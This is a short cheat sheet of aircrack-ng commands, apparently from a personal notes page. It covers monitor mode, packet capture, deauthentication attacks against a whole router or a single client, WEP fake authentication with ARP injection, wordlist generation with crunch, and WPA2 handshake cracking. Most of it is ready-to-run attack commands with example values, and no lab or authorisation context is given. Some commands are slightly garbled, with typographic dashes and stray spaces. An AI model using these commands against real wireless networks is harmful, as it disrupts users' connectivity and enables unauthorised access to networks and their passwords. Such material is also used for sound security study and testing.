Logo

airodump-ng -channel 12 —bssid 40:30:20:10 —write out.txt mon0

Control Network Interface & Switch Network Modes

//Check Wireless Interface
iwconfig

// Turn Off Interface
airmon-ng check kill
ifconfig <interface> down        //(use if check kill doesnt work)

// Switch to monitor mode
airmon-ng start <interface>   

// Switch Back to Managed Mode & Restart 
airmon-ng stop <interface>      
service NetworkManager start

Airodump - Analyse

// Analyse Interface
airodump-ng <interface>

// Analyse Interface's Channel & SSID
airodump-ng -channel <channel> —bssid <bssid> —write <file_name> <interface>
# airodump-ng -channel 12 —bssid 40:30:20:10 —write out.txt mon0

Attack Phase

Aireplay - Deauth Attack

// Deauth on a entire Router using its BSSID
aireplay-ng —deauth <packets> -a <AP> <interface>   
# ex: aireplay-ng —deauth 1000 -a 10:20:30:40 mon0

// Deauth speific target on Router
aireplay-ng —deauth <packets> -a <AP> -c <target> <interface>
# ex: aireplay-ng —deauth 1000 -a 10:20:30:40 -c 00:AA:11:BB mon0

WEP Cracking - Fake Auth & Packet Injection [Aireplay]

// Fake Authetication 
aireplay-ng —fakeauth 0 -a <target_MAC> -h <kali_MAC> <interface>
# ex: aireplay-ng —fakeauth 0 - a 10:20:30:40 -h 50:AA:BB:40 mon0

// Packet Injection (ARP)
aireplay-ng —arpreplay-ng -b <target_MAC> -h <kali_MAC> <interface>
# aireplay-ng —arpreplay-ng - b 10:20:30:40 -h 00:aa:bb:33 mon0

WPA2 Cracking [Aircrack]

// Generate Handshake File
-- Use Deauth on Target to generate handshake file [Airodump + Aireplay]

// Generate Wordlist [Crunch]
crunch <min> <max> <char> -t <pattern> -o file
# crunch 8 10 123!’^+% -t m@@@p -file wordlist

// Crack using Handshake File & Wordlist
aircrack-ng <handshake_file> -w <wordlist>
# ex: aircrack-ng test-01.cap -w wordlist

© 2025 All rights reservedBuilt with DataHub Cloud

Built with LogoDataHub Cloud